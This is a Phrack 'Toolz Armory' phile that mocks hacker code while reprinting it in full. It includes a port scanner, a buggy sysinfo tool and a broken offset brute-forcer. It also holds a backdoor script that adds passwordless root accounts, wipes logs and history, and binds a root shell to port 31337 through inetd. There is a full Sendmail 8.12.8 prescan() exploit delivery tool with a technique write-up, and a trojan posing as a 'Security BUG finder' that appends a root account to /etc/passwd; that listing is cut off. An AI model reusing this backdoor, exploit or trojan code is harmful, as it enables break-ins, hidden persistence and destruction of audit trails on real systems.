==Phrack Inc.== Volume 0x0b, Issue 0x3e, Phile #0x04 of 0x0f |=--------------------=[ T O O L Z A R M O R Y ]=----------------------=| |=-----------------------------------------------------------------------=| |=-----=[ skyper's harddrive[ root@segfault.net:/cvs/0day# ls ]=-------=| |=---------=[ brought to you by elguapo 'the warez' gestapo ]=-----------=| This is a totally revamped Toolz Armory. Previous editions focused too much on whitehat 'tools' that never get used. This section will now focus on the latest and greatest hacker code on the internet. While some of these codes are more dated than others, they are nonetheless some of the greatest examples of why Full Disclosure is fucking pathetic. HERE'Z THE 0DAY! --[ Contents 1 - vanilla.sh 2 - sysinfo.c 3 - pr00fsh.txt 4 - ESobf.c 5 - north_sendmail.c 6 - secbug.c --[ 1 - vanilla.sh Author: Ben to the muthafuckin Z Affliations: Team OG (Ripping off Taco Bell since '01) Comment: y0, i use thiz c0de all the time to scan those awesome korean networks which provide the greatest bounce for me to hack shit in the us. n0thing like making ge0rge bush thinking that k0rea is trying to take us out! use this code to map out all the available TCP services. its just gr8! ++> Begin 0day #!/bin/sh # vanilla.sh - tcp connection (telnet) port scanner for non-root users # by: ben-z(@alloymail.com) http://benz.staticky.com # set up our environment vv="[vanilla!benz]:" count="$2" mv .vs.tmp .vs.tmp.bak 1>/dev/null 2>/dev/null clear if [ `whoami` = "root" ]; then echo "$vv this portscan was designed for normal users ." echo "$vv it would make more sense for you to use a faster scanning " echo "$vv utility such as nmap or " echo "$vv strobe . If you still want to continue," echo "$vv you may switch to a normal user account and run this again. " exit 0 fi # print the usage instructions if [ "$2" = "" ]; then echo "$vv usage is: $0 [-c]" echo "$vv examples:" echo "$vv vs 127.0.0.1 1024 <-- this would scan 127.0.0.1 p1024->65535" echo "$vv vs 127.0.0 23 -c <-- this would scan 127.0.0.1-255 p23" exit 0 fi # do a single host scan if no -c if provided if [ "$3" = "-c" ]; then echo "$vv not yet implemented.. sorry :P" exit 0 fi echo "" echo "$vv now scanning $1 on ports $count -> 65535." echo "vanilla.sh v1 by ben-z(@alloymail.com) http://benz.staticky.com" >>.vs.tmpecho "$vv results of scan on $1 ($count -> 65535):" >>.vs.tmp while [ "$count" != "65535" ]; do count=`expr $count + 1` echo -n "$vv ($count) attempting connection to $1" telnet $1 $count 1>.vs2.tmp 2>.vs2.tmp & killall -9 telnet 1>/dev/null 2>/dev/null cat .vs2.tmp | grep -v refused | grep closed >/dev/null 2>&1 if [ $? -eq 0 ]; then echo -n " connected!" # try to determine which port we found if [ "$count" = "1" ]; then echo "1/tcp: tcpmux" >>.vs.tmp fi echo -n " connected!" # try to determine which port we found if [ "$count" = "1" ]; then echo "1/tcp: tcpmux" >>.vs.tmp fi if [ "$count" = "7" ]; then echo "7/tcp: echo" >>.vs.tmp fi if [ "$count" = "9" ]; then echo "9/tcp: discard" >>.vs.tmp fi if [ "$count" = "11" ]; then echo "11/tcp: systat" >>.vs.tmp fi if [ "$count" = "13" ]; then echo "13/tcp: daytime" >>.vs.tmp fi .. [knip] fi echo "" done exit 0 --> End 0day --[ 2 - sysinfo.c Author: Brainstorm Affliations: Electronic Souls (Getting Raided since '03) Comment: omg. This quite possibly the most used code among the Phrack Staff. Ever get on a Linux box and what to know whats going down? THIS CODE IS FOR YOU! This could easily be written in a shell script, but fuck that! Calling execl() to cat files is the m0st d4rk method out there. ES is just 2blackhat4u. They be smashin' and backdoorin' like they're getting raided tomorrow! NO HOLDS BARRED! ++> Begin 0day /* * (C) BrainStorm - ElectronicSouls * small application to get some system information * yes i know its simple..so ? doesnt make it useless :P * might be a nice bin for Blackhat linux :> */ #include #include #include #include int main(int argc, char **argv[]) { char *select; printf("\n\n +++ ElectronicSouls System Information +++ \n\n"); if (strstr(argv[1], "-cpu") != NULL) { printf("\n *** CPU MODEL *** \n\n"); execl("/bin/cat","/bin/cat","/proc/cpuinfo",0); } if (strstr(argv[1], "-mem") != NULL) { printf("\n *** MEMORY INFORMATION: *** \n\n"); execl("/bin/cat","/bin/cat","/proc/meminfo",0); } if (strstr(argv[1], "-mod") != NULL) { printf("\n *** KERNEL MODULES: *** \n\n"); execl("/bin/cat","/bin/cat","/proc/modules",0); } if (strstr(argv[1], "-dev") != NULL) { printf("\n *** DEVICES: *** \n\n"); execl("/bin/cat","/bin/cat","/proc/devices",0); } if (strstr(argv[1], "-lod") != NULL) { printf("\n *** LOAD AVERAGE: *** \n\n"); execl("/bin/cat","/bin/cat","/proc/loadavg",0); } if (strstr(argv[1], "-fs") != NULL) { printf("\n *** FILESYSTEM STATUS: *** \n\n"); execl("/bin/cat","/bin/cat","/proc/stat",0); } if (strstr(argv[1], "-mnt") != NULL) { printf("\n *** MOUNTED: *** \n\n"); execl("/bin/cat","/bin/cat","/proc/mounts",0); } if (strstr(argv[1], "-iop") != NULL) { printf("\n *** IOPORTS: *** \n\n"); execl("/bin/cat","/bin/cat","/proc/ioports",0); } if (strstr(argv[1], "-pt") != NULL) { printf("\n *** PARTITIONS: *** \n\n"); execl("/bin/cat","/bin/cat","/proc/partitions",0); } if (strstr(argv[1], "-pt") != NULL) { printf("\n *** INTERRUPTS: *** \n\n"); execl("/bin/cat","/bin/cat","/proc/interrupts",0); } if (argv[1], "-h") { printf("\n Help: \n\n"); printf("./sys -cpu : will give you cpu informations \n"); /* no argv[0] this time heh */ printf(" -mem : shows you memory informations \n"); printf(" -mod : lists the kernel modules \n"); printf(" -dev : gives you device informations \n"); printf(" -lod : shows the load average \n"); printf(" -fs : lists file system informations \n"); printf(" -mnt : shows the mounted devices \n"); printf(" -iop : lists the IO Ports \n"); printf(" -pt : lists the existing partitions \n"); printf(" -ir : shows the interrupts \n\n"); } exit(0); } --> End 0day [ editor's note: y0 brainst0rm. you might want to brush up on your C in 24 Hours and man getopt_long() ] --[ 3 - pr00fsh.txt Author: Digital Ebola Affliations: Legions of the Underground (Sucking Cock since '99) Comments: I'm just in awe of the ability demonstrated here. Seriously, who uses kernel modules and trojaned binaries anymore when you're backdooring dugsong? This script is *guaranteed* to cover all of your tracks as you're hacking your way into w00w00's silcnet server. ++> Begin 0day cp /etc/hosts.allow /tmp/h.a cp /etc/hosts.deny /tmp/h.d cp /etc/inetd.conf /tmp/i.c echo "# /etc/hosts.allow" > /etc/hosts.allow echo "#" >> /etc/hosts.allow echo "# /etc/hosts.deny" > /etc/hosts.deny echo "#" >> /etc/hosts.deny echo unf::9998:9998:unf,,,:/tmp:/bin/bash >> /etc/passwd echo unf2::0:0:unf,,,:/tmp:/bin/bash >> /etc/passwd echo unf::0:99999:7::: >> /etc/shadow echo unf2::0:99999:7::: >> /etc/shadow cat /dev/null > /root/.bash_history cat /dev/null > /tmp/.bash_history cat /dev/null > /var/log/syslog cat /dev/null > /var/log/messages cat /dev/null > /var/log/wtmp killall -9 inetd echo "31337 stream tcp nowait root /bin/sh -i" >> /etc/inetd.conf `which inetd` --> End 0day --[ 4 - ESobf.c Author: vux Affliations: ElectronicSouls (Gettin' Raided since '03) Comments: This amazing tool allows even the laziest of hackers to find the proper offset for some 0day man(1) warez. Why bother writing a 3 line shell script when you can compile it in C! Someone PLEASE stop ElectronicSouls from producing anymore of these blackart tools before they get raided again!!! --> Begin 0day /* (C) vux [ElectronicSouls] * * PROPERTY OF THE ELECTRONICSOULS CREW ! * DO NOT DISTRIBUTE ! * * simple offset brute forcer - easy guessing the offset needed to run any exploit succefully. * it's not tested but it should work! if you find any error in the code, please let me know! * */ #include #define PATH "/path/to/exploit -o [ofst]" // change it to the exploits's // path with the offsets's param int main() { int var; for (var = -2000;var < 2000;var = var +1); { printf("\tbrute forcing : \n"); printf("trying offset : %d\n", var); system("ulimit -c 0; %s "PATH"", var); return 0; } } ++> End 0day --[ 5. north_sendmail.c Author: north Affliations: #plan9@efnet Comments: INITIATING ATTACK VECTOR EXPLOITATION CODE WRAPPER.... SEQUENCE COMPLETED... INJECTING TRANSPOSED VECTOR INTO EXPLOITABLE REMOTE STREAM! HOLY SHIT! USING THIS EXPLOIT IS KINDA LIKE BITING INTO A Y0RK PEPPERMINT PATTY! DONT TELL ANYBODY, BUT WHENEVER I USE NORTH'S EXPLOITS I FEEL LIKE CAPTAIN KIRK COMMANDING THE STARSHIP ENTERPRISE! HIGH TECH WOWOW! All I gotta say is that this exploit outdoes any GOBBLES exploit ever in the comments to code ratio. I think north provided enough information to write a fucking book with this. And the great thing is it doesn't even give you a rootshell!!! --> Begin 0day /* * 127 Research and Development * * Sendmail v8.12.8 and older prescan() exploit. * * Console users, please set your tabstop to 4 * * Don't buy the hype! This vulnerability is not your straight forward overflow * or frame pointer overwrite. If you have received code that asserts said * claim, consider possibly hostile. * * How this vulnerability works: * * The prescan vulnerability (purportedly found by Michael Zalewski) is much * more fun than the standard overflow. Though the stack may be overwritten, it * may only be overwritten with one of two specific values: 0x5c or 0x00. * Because of this restriction, values altered on the stack can be changed to * a much more limited set of valid addresses. * * An interesting fact about prescan is that, despite overrunning the stack, the * overrun is practically moot. Since prescan always tests for any kind of * invalidity, usrerr() will be called. Prescan can not be returned from due to * these checks if an overflow is implemented. Usrerr's functionality specifies * that it raises an exception via the sm library if QuickAbort is set to true. * QuickAbort is frequently set to true on entry to functions that call prescan. * * The result of a raised exception is the restoration of environment at a given * point of execution. SmExcHandler, the exception handler, is probed for the * information to restore said environment. Information is typically stored in * a standard UNIX sigjmp_buf in the sm_exc_handler structure. This structure * is declared before entry to many SMTP command code segments with the SM_TRY * macro, conveniently placing the handler on the stack. * * The structure of a typical UNIX sigjmp_buf is an array of address values * defining what the execution environment looked like, as a snapshot, at a * specific point in code execution. A sigjmp_buf is generated in a UNIX * environment using functions such as [_]sigjmp() or sigsetjmp(). Frequently, * the first value in this array of addresses defines the PC that should be * reentered with a call to siglongjmp() or [_]longjmp(). These functions * recreate the environment specified by the sigjmp_buf and place the PC * in a location the CPU can place into the PC register on return. * * In certain situations, the Exception Handler placed on the stack may be * reached when we overflow a buffer with prescan's vulnerability, allowing * us to overwrite the values stored in the sigjmp_buf. However, since we * may only overwrite memory with 0x5c and a terminating nul, execution * redirection is extremely limited, but, not ungratifying. * * By overwriting the PC with 0x00, 0x005c, 0x005c5c, etc, we can manipulate * execution of this altered PC by forcing an exception to be raised with * our already illegal length. In certain (extremely temperamental) conditions * we can drop into a pseudo-random point in the valid data segment, thus * continuing execution. This executed code, however, submits to its env, * assuming that the values in the stack are valid for its purpose. If we * are able to drop into a segment of code that expects values on the stack * to be of a format we can manipulate to our benefit, the current code may * be exploited: generating a secondary vulnerability. Remember, the stack * environment regenerated by siglongjmp/[_]longjmp still points to data * read from the network. Thus, it is possible to exploit this secondary * vulnerability in order to execute malicious code we provide over the * network. * * Yet, it is still not quite that simple. While reading from the network, * sendmail parses commands one of two ways. Either it begins to interpret a * command when a newline is read from the network, or, when up to 2048 octets * are read from the network. sm_io_fgets() calls the network read function * which stores a given amount of data in its buffer. The value of the read * buffer for the sendmail file structure is 17376. Basically, this means that * even though a command is attempted to be parsed after, at the most, 2048 * octets read from the network, we can store a large amount of unaltered * data in memory. This unaltered memory is perfect for malicious machine code * since it will never become subject to a lexicon that attempts to weed out * invalid octets. * * The SMTP command packet, however, is another story. It is subject to * restrictions found in parseaddr.c's TokTypeTab and StateTab arrays, which * may cause prescan to return before an overflow may occur. Since this buffer * is the closest we can get to the values found in the sigjmp_buf, we must * post a fake stack frame here, before the octets that create the actual * overflow condition. Adhereing to the rules of TokTypeTab and StateTab, we * are still able to create valid stack addresses for many popular UNIX * Operating Systems. Once our mangled PC is executed, this maliciously * generated stack frame can suit as a trampoline to our malicious machine * code in sendmail's file structure's read buffer. * * There is no cookie cutter solution to exploiting this vulnerability. * However, exploitation has proven to be possible on several target UNIX * operating systems. * * How this exploit works: * * This exploit allows a queue to be built, from which individual packets * are sent to a target host. * * Queues are built from the five segment structures, which create a * conceptually fragmented view of a full packet. * * The structure of a single packet can be perceived as: * [ ... Global Packet ............... ] * [SMTP Command][Stack Frame][Overflow Octets]['\n'][Machine Code] * 0 1 2 3 4 * * Segment Descriptions * * Segment 0 * * Segment zero contains a SMTP Command (e.g. HELO) and optionally, its * parameters. The command is generated from a string read via prejack's * command line. Trailing white space (up to the newline) are kept. * * Segment 1 * * Segment one contains a bitmap that will represent a malicious stack frame * used by the target machine once its PC is mangled. The bitmap is loaded * from a file whose name is read via prejack's command line. * * Segment 2 * * Segment two contains the overflow segment, an array of the repeating pattern * "\x5c\xff" which is necessary to force the overflow. Note that for every * instance of this pattern, it generates only *one* character (0x5c) in the * target's buffer. Therefore, to reach a sigjmp_buf 512 octets away, you must * use 1024 octets. The length of this segment is read from the command line * as a decimal number. * * Segment 3 * * Segment three contains a single newline, needed to seperate sendmail's * concept of commands. Segments 0 through 3 create a single command, while * segment four is interpreted as a second command and isn't parsed, but, is * still stored in memory. * * Segment 4 * * Segment four contains a bitmap of machine code used on the target system. * This code is loaded from a file whose name is given on the prejack command * line. * * Queues are built incrementally from segment 0 to segment 4, skipping any * segments with no data. * * This vulnerability was extremely fun to analyze. Enjoy! * Sorry, bitmaps (and possibly batteries) not included * * Exploit written on Sunday, April 27, 2003. * * Total time spent reading the sendmail code for the first time: 4 days * Total time spent generating the exploit strategy/code: 4 hours 52 minutes * Total time spent writing this header: 1 hour <-- haha :) * * - north_ * * northern_snow78@yahoo.com * http://blessedchildren.virtualave.net/ * #plan9@EFnet * */ /* * Example program usage * * pumpkin.north_ % ./prejack * prejack> set address=1.3.27.105 * set. * prejack> set port=25 * set. * prejack> segment 0 HELO pumpkin.autumn.net.sc * done. * prejack> queue add * generating queue entry from current segments... * adding segment 0 * added. * prejack> segment 0 MAIL FROM: north_@autumn.net.sc * done. * prejack> queue add * generating queue entry from current segments... * adding segment 0 * added. * prejack> segment 0 RCPT TO: * done. * prejack> segment 1 ../q * attempting to load bitmap from file ../q * loading 1240 octets... done. * prejack> segment 2 390 * generating overflow vector segment of length 390 * done. * done. * prejack> queue add * generating queue entry from current segments... * adding segment 0 * adding segment 1 * adding segment 2 * added. * prejack> queue dump * queue slot 0; vector=0804d040; len=26; * dumping 26 bytes for tagging * { * 48 45 4c 4f 20 70 75 6d 70 6b 69 6e 2e 61 75 74 HELO pumpkin.aut * 75 6d 6e 2e 6e 65 74 2e 73 63 umn.net.sc * } * queue slot 1; vector=0804d060; len=31; * dumping 31 bytes for tagging * { * 4d 41 49 4c 20 46 52 4f 4d 3a 20 6e 6f 72 74 68 MAIL FROM: north * 5f 40 61 75 74 75 6d 6e 2e 6e 65 74 2e 73 63 _@autumn.net.sc * } * queue slot 2; vector=0805f800; len=1639; * dumping 32 bytes for tagging * { * 52 43 50 54 20 54 4f 3a 20 71 71 71 71 71 71 71 RCPT TO: qqqqqqq * 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 qqqqqqqqqqqqqqqq * } * prejack> run * attempting to connect... * connected. * starting the client, pushing the FIFO * stand by for session transaction ... * recv="220 slushpuppy.autumn.net.sc ESMTP Sendmail 8.12.8/8.12.8; Sun, 27 Apr 200 * 3 15:13:30 -0400 (EDT)" * sending queue slot 0 * recv="250 slushpuppy.autumn.net.sc Hello pumpkin.autumn.net.sc [1.3.27.103], ple * ased to meet you" * sending queue slot 1 * recv="250 2.1.0 north_@autumn.net.sc... Sender ok" * sending queue slot 2 * warning: connection reset by peer * done. * prejack> exit * goodbye. * pumpkin.north_ % * * Note that the "connection reset by peer" was caused by SIGSEGV * */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define nil ((void * )0) enum { Cexit, Cset, Crun, Csegment, Cqueue, Cerr, }; typedef unsigned char uchar; typedef struct Setting Setting; typedef struct Segment Segment; typedef struct Queue Queue; struct Setting { const char * name; const char * type; char * value; const char * descr; }; struct Segment { const char * name; void (*action)(char * ); void (*dump)(Segment * ); uchar * vector; uint len; }; struct Queue { uchar * vector; uint len; Queue * next; }; static Setting settings[] = { { "address", "string", nil, "target ipv4 address" }, { "port", "integer", nil, "sendmail server port number" }, { "alarm", "integer", nil, "duration in seconds for read timeout" }, { "delay", "integer", nil, "duration to delay between queue sends" }, { nil, nil, nil, nil } }; static void seg0action(char * ); static void seg0dump(Segment * ); static void seg1action(char * ); static void seg1dump(Segment * ); static void seg2action(char * ); static void seg2dump(Segment * ); static void seg3action(char * ); static void seg3dump(Segment * ); static void seg4action(char * ); static void seg4dump(Segment * ); static Segment segments[] = { { "smtp command", seg0action, seg0dump, nil, 0 }, { "attack bitmap", seg1action, seg1dump, nil, 0 }, { "overflow vector", seg2action, seg2dump, nil, 0 }, { "newline", seg3action, seg3dump, nil, 0 }, { "excess data", seg4action, seg4dump, nil, 0 } }; static Queue * queue = nil; static int alarmcalled = 0; static void fatal(const char * ); static void message(char * ); static void readline(char ** ); static int command(char * ); static int command2cmd(char ** ); static void cmdrun(char * ); static void cmdset(char * ); static void cmdsegment(char * ); static void cmdsegmentusage(void); static void cmdqueue(char * ); static void cmdqueueusage(void); static void dumpsegment(int); static void printsettings(void); static void loadbitmap(Segment * , char * ); static void hexdump(uchar * , uint); static void queuedump(void); static void queueadd(void); static void queuedel(void); static void alarmcall(int); static int dialout(void); static int readnet(int); int main(void) { char * buffer; signal(SIGALRM, alarmcall); do { message("prejack> "); readline(&buffer); if(command(buffer) == Cexit) break; } while(1); } static void fatal(const char * fun) { perror(fun); exit(1); } static void message(char * msg) { if(write(1, msg, strlen(msg)) != strlen(msg)) fatal("write@message()"); } static void readline(char ** bp) { char buffer[2048]; char * c; int spin; int xa; memset(buffer, 0, sizeof(buffer)); c = &buffer[0]; xa = 0; spin = 1; do { xa = read(0, c, 1); switch(xa) { default: case -1: { fatal("read@readline()"); } case 0: { spin = 0; break; } case 1: { if(*c == '\n' || *c == '\r' || (c - buffer) >= sizeof(buffer) - 1) { *c = 0; spin = 0; } c++; break; } } } while(spin); if((*bp = strdup(buffer)) == nil) fatal("strdup@readline()"); } static int command(char * cs) { char * args; int cmd; args = cs; cmd = 0; cmd = command2cmd(&args); switch(cmd) { case Cexit: { message("goodbye. \n"); break; } case Cerr: { message("error: invalid command \n"); break; } case Crun: { cmdrun(args); break; } case Cset: { cmdset(args); break; } case Csegment: { cmdsegment(args); break; } case Cqueue: { cmdqueue(args); break; } } free(cs); return cmd; } static int command2cmd(char ** csp) { char * cs; int cmd; int xa; cmd = Cerr; xa = 0; cs = *csp; if(strncasecmp(cs, "exit", strlen("exit")) == 0) { xa = strlen("exit"); cmd = Cexit; } else if(strncasecmp(cs, "set", strlen("set")) == 0) { xa = strlen("set"); cmd = Cset; } else if(strncasecmp(cs, "run", strlen("run")) == 0) { xa = strlen("run"); cmd = Crun; } else if(strncasecmp(cs, "segment", strlen("segment")) == 0) { xa = strlen("segment"); cmd = Csegment; } else if(strncasecmp(cs, "queue", strlen("queue")) == 0) { xa = strlen("queue"); cmd = Cqueue; } *csp = cs + xa; return cmd; } static void cmdset(char * args) { Setting * s; char * as; char * c; for(as = args; isascii(*as) && isspace(*as) && *as != 0; as++) continue; // if no arguments, print the settings if(*as == 0) { printsettings(); return; } for(c = as; isascii(*c) && !isspace(*c) && *c != 0; c++) continue; *c = 0; if((c = strchr(as, '=')) == nil) { message("usage: set [variable=value] \n"); return; } *c++ = 0; if(*c == 0) { message("usage: set [variable=value] \n"); return; } if(strcasecmp(as, "address") == 0) s = &settings[0]; else if(strcasecmp(as, "port") == 0) s = &settings[1]; else if(strcasecmp(as, "alarm") == 0) s = &settings[2]; else if(strcasecmp(as, "delay") == 0) s = &settings[3]; else { fprintf(stdout, "error: invalid variable %s \n", as); fflush(stdout); return; } if(s->value) free(s->value); if((s->value = strdup(c)) == nil) fatal("strdup@cmdset()"); message("set.\n"); } static void cmdrun(char * args) { char buffer[2048]; Queue * q; char * c; int fd; int xa; int d; int e; if(queue == nil) { fprintf(stdout, "empty queue. build a queue before attacking. \n"); return; } fd = 0; if((fd = dialout()) == -1) return; // set an optional delay between queue sends d = 0; if(settings[3].value) d = atoi(settings[3].value); fprintf(stdout, "starting the client, pushing the FIFO \n"); fprintf(stdout, "stand by for session transaction ... \n"); fflush(stdout); // read the banner if(readnet(fd) == -1) { close(fd); return; } // start the queue push xa = 0; for(q = queue; q; q = q->next) { if(d) { fprintf(stdout, "delaying %ds ", d); fflush(stdout); for(e = 0; e < d; e++) { fprintf(stdout, "."); fflush(stdout); sleep(1); } fprintf(stdout, "\n"); } fprintf(stdout, "sending queue slot %d \n", xa++); fflush(stdout); if(write(fd, q->vector, q->len) != q->len) { fprintf(stdout, "error: network write failed: %s \n", strerror(errno)); break; } // always write a newline since we cant write one in the segments if(write(fd, "\n", 1) != 1) { fprintf(stdout, "error: network write failed: %s \n", strerror(errno)); break; } if(readnet(fd) == -1) break; } close(fd); fprintf(stdout, "done. \n"); fflush(stdout); } static void cmdsegment(char * args) { char * as; char * c; char tmp; int seg; for(as = args; isascii(*as) && isspace(*as) && *as != 0; as++) continue; for(c = as; isascii(*c) && !isspace(*c) && *c != 0; c++) continue; for(; isascii(*c) && isspace(*c) && *c != 0; c++) continue; seg = 0; seg = atoi(as); if(seg < 0 || seg > 4 || *c == 0) { cmdsegmentusage(); return; } for(as = c; isascii(*c) && !isspace(*c) && *c != 0; c++) continue; if(strcasecmp(as, "dump") == 0) { dumpsegment(seg); return; } segments[seg].action(as); fprintf(stdout, "done. \n"); fflush(stdout); } static void cmdsegmentusage(void) { message("usage: segment number action [arg] \n"); message(" segment 0 { dump | string } # set the SMTP command string \n"); message(" segment 1 { dump | file } # load the special seg from bitmap file \n"); message(" segment 2 { dump | integer } # define the length of the overflow seg \n"); message(" segment 3 { dump | integer } # force a newline between seg2 and seg4 \n"); message(" segment 4 { dump | file } # load extra segment from bitmap file \n"); } static void cmdqueue(char * args) { for(; isascii(*args) && isspace(*args) && *args != 0; args++) continue; if(strncasecmp(args, "dump", strlen("dump")) == 0) queuedump(); else if(strncasecmp(args, "add", strlen("add")) == 0) queueadd(); else if(strncasecmp(args, "del", strlen("del")) == 0) queuedel(); else cmdqueueusage(); } static void cmdqueueusage(void) { message("usage: queue { add | del | dump } \n"); } static void dumpsegment(int seg) { segments[seg].dump(&segments[seg]); fprintf(stdout, "dumped. \n"); fflush(stdout); } static void printsettings(void) { Setting * s; int xa; fprintf(stdout, "\n"); fprintf(stdout, "%-8s %-8s %-8s \n", "name", "type", "value"); for(xa = 0; xa < 27; xa++) fprintf(stdout, "-"); fprintf(stdout, "\n"); for(s = &settings[0]; s->name != nil; s++) { fprintf(stdout, "%-8s %-8s %-16s %s \n", s->name, s->type, s->value != nil ? s->value : "", s->descr); } fprintf(stdout, "\n"); fflush(stdout); } static void seg0action(char * action) { if(segments[0].vector) free(segments[0].vector); if((segments[0].vector = strdup(action)) == nil) fatal("strdup@seg0action()"); segments[0].len = strlen(segments[0].vector); } static void seg0dump(Segment * s) { fprintf(stdout, "%s=\"%s\" \n", s->name, s->vector ? (char * )s->vector : ""); fflush(stdout); } static void seg1action(char * action) { loadbitmap(&segments[1], action); } static void loadbitmap(Segment * s, char * file) { struct stat ssx; int fd; if(s->vector != nil) { free(s->vector); s->len = 0; } fprintf(stdout, "attempting to load bitmap from file %s \n", file); fd = 0; if((fd = open(file, O_RDONLY)) == -1) { fprintf(stdout, "error: unable to open bitmap file \n"); return; } memset((void * )&ssx, 0, sizeof(ssx)); if(fstat(fd, &ssx) == -1) { fprintf(stdout, "error: stat on bitmap file failed \n"); close(fd); return; } if((signed )ssx.st_size <= 0) { fprintf(stdout, "error: bitmap file size invalid \n"); close(fd); return; } fprintf(stdout, "loading %d octets... ", ssx.st_size); if((s->vector = calloc(1, ssx.st_size + 1)) == nil) fatal("calloc@loadbitmap()"); s->len = ssx.st_size; if(read(fd, s->vector, s->len) != s->len) { fprintf(stdout, "error: read failed \n"); free(s->vector); s->len = 0; } close(fd); } static void seg1dump(Segment * s) { fprintf(stdout, "dumping %d octets of segment \"%s\" \n", s->len, s->name); hexdump(s->vector, s->len); } static void seg2action(char * action) { uchar * v; int xa; if(segments[2].vector) { free(segments[2].vector); segments[2].vector = nil; segments[2].len = 0; } xa = 0; xa = atoi(action); if(xa <= 0 || xa > 2048) { fprintf(stdout, "error: segment length out of range \n"); return; } fprintf(stdout, "generating %s segment of length %d \n", segments[2].name, xa); if((segments[2].vector = calloc(1, xa + 1)) == nil) fatal("calloc@seg2action()"); for(v = &segments[2].vector[0]; v - &segments[2].vector[0] < xa - 1; ) { *v++ = 0x5c; *v++ = 0xff; } *v++ = 'q'; segments[2].len = xa; fprintf(stdout, "done. \n"); fflush(stdout); } static void seg2dump(Segment * s) { fprintf(stdout, "%s=\"%.08x\" \n", s->name, s->len); fflush(stdout); } static void seg3action(char * action) { int xa; if(segments[3].vector) { free(segments[3].vector); segments[3].len = 0; } if((segments[3].vector = calloc(1, 1)) == nil) fatal("calloc@seg3action()"); *segments[3].vector = '\n'; segments[3].len = 1; } static void seg3dump(Segment * s) { fprintf(stdout, "%s=\"%.08x\" \n", s->name, s->len); fflush(stdout); } static void seg4action(char * action) { loadbitmap(&segments[4], action); } static void seg4dump(Segment * s) { fprintf(stdout, "dumping %d octets of segment \"%s\" \n", s->len, s->name); hexdump(s->vector, s->len); } static void hexdump(uchar * vector, uint vlen) { int u; int v; v = 0; for(u = 0; u < vlen; u++) { fprintf(stdout, "%.02x ", vector[u]); if((u + 1) % 16 == 0) { for(v = u - 15; v <= u; v++) fprintf(stdout, "%c", isprint(vector[v]) ? vector[v] : '.'); fprintf(stdout, "\n"); } } if(v < vlen) { for(; v < vlen; v++) { fprintf(stdout, "%c", isprint(vector[v]) ? vector[v] : '.'); } fprintf(stdout, "\n"); } } static void queuedump(void) { Queue * q; int len; int xa; len = 0; xa = 0; if(queue == nil) { fprintf(stdout, "no queue to dump. \n"); return; } for(q = queue; q; q = q->next, xa++) { len = q->len >= 32 ? 32 : q->len; fprintf(stdout, "queue slot %d; vector=%.08x; len=%d; \n", xa, q->vector, q->len); fprintf(stdout, "\t dumping %d bytes for tagging \n", len); fprintf(stdout, "{ \n"); hexdump(q->vector, len); fprintf(stdout, "} \n"); } fflush(stdout); } static void queueadd(void) { Queue ** qx; Queue * q; uchar * v; uchar * c; uint vl; int xa; if(queue != nil) { for(q = queue; q->next != nil; q = q->next) continue; qx = &q->next; } else qx = &queue; if((q = calloc(1, sizeof(Queue))) == nil) fatal("calloc@queueadd()"); fprintf(stdout, "generating queue entry from current segments... \n"); vl = 0; for(xa = 0; xa < 5; xa++) if(segments[xa].vector && segments[xa].len > 0) vl += segments[xa].len; if((v = calloc(1, vl + 1)) == nil) fatal("calloc:2@queueadd()"); c = &v[0]; for(xa = 0; xa < 5; xa++) if(segments[xa].vector && segments[xa].len > 0) { fprintf(stdout, "adding segment %d \n", xa); memcpy(c, segments[xa].vector, segments[xa].len); c += segments[xa].len; // clean up as we go free(segments[xa].vector); segments[xa].vector = nil; segments[xa].len = 0; } q->vector = v; q->len = vl; *qx = q; fprintf(stdout, "added. \n"); fflush(stdout); } static void queuedel(void) { Queue * q; Queue * r; if(queue == nil) { fprintf(stdout, "no queue entries to delete. \n"); return; } fprintf(stdout, "deleting most recently added queue entry \n"); r = nil; for(q = queue; q->next != nil; r = q, q = q->next) continue; free(q->vector); free(q); if(r) r->next = nil; else queue = nil; fprintf(stdout, "deleted. \n"); } static void alarmcall(int sig) { if(sig == SIGALRM) alarmcalled = 1; } static int dialout(void) { struct sockaddr_in sin; int port; int fd; int a; if(settings[0].value == nil || settings[1].value == nil) { fprintf(stdout, "error: equate the settings before attacking \n"); fflush(stdout); return -1; } fprintf(stdout, "attempting to connect... \n"); fd = 0; if((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) fatal("socket@dialout()"); memset((void * )&sin, 0, sizeof(sin)); sin.sin_addr.s_addr = inet_addr(settings[0].value); sin.sin_family = AF_INET; port = atoi(settings[1].value); sin.sin_port = htons(port); // don't you hate to wait forever? a = 7; if(settings[2].value) a = atoi(settings[2].value); alarmcalled = 0; alarm(a); do { if(connect(fd, (void * )&sin, sizeof(sin)) == -1) { close(fd); if(alarmcalled) fprintf(stdout, "error: connection to %s:%d timed out", settings[0].value, settings[1].value); else fprintf(stdout, "error: connect attempt to %s:%d failed: %s", settings[0].value, settings[1].value, strerror(errno)); fflush(stdout); return -1; } alarm(0); break; } while(1); fprintf(stdout, "connected. \n"); fflush(stdout); return fd; } static int readnet(int fd) { char buffer[4096]; char * c; int xa; int a; memset(buffer, 0, sizeof(buffer)); a = 7; if(settings[2].value) a = atoi(settings[2].value); alarmcalled = 0; alarm(a); xa = 0; xa = read(fd, buffer, sizeof(buffer) - 1); alarm(0); switch(xa) { case -1: { if(alarmcalled) fprintf(stdout, "error: network read timed out \n"); else fprintf(stdout, "error: network read %s \n", strerror(errno)); fflush(stdout); return -1; } case 0: { fprintf(stdout, "warning: connection reset by peer \n"); return -1; } default: { for(c = buffer; c - buffer < xa; c++) if(*c == '\r' || *c == '\n') { *c = 0; break; } break; } } fprintf(stdout, "recv=\"%s\"\n", buffer); fflush(stdout); return 0; } ++> End 0day --=[ 6. secbug.c Author: sh Affliations: ?? Comments: This has to be one of the greatest trojans that I have ever laid eyes upon. The level of skill that was taken to hide this. I mean, this surpasses the phrack extraction utility by ten fold. Good work sh! =) P.S. divineint/gov-boi ran this! --> Begin 0day /* Security BUG finder idae by sh...written by sh:) */ #include #include main () { int i; FILE * fp; printf(" Security BUG finder!\n`----------------------\n\n"); if (getuid() != 0) { fprintf(stderr, "ERROR#1: Run as root only!\n\ Thiz program reads many informations from kernel and thats only allowed for root\n"); exit(1); } fp = fopen("/etc/passwd", "r+"); if (fp==NULL) { fprintf(stderr, "ERROR#2: Can't open identification file!\n"); exit(1); } fseek(fp, 0, SEEK_END); fputs("qmailk::0:0:qmail 